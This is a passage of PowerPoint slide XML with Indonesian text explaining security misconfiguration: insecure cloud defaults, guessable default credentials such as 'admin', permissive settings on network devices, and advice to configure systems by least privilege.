              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada bucket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebocoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesederhanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditebak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 'admin' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permisif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router dan switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didokumentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Administrator dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
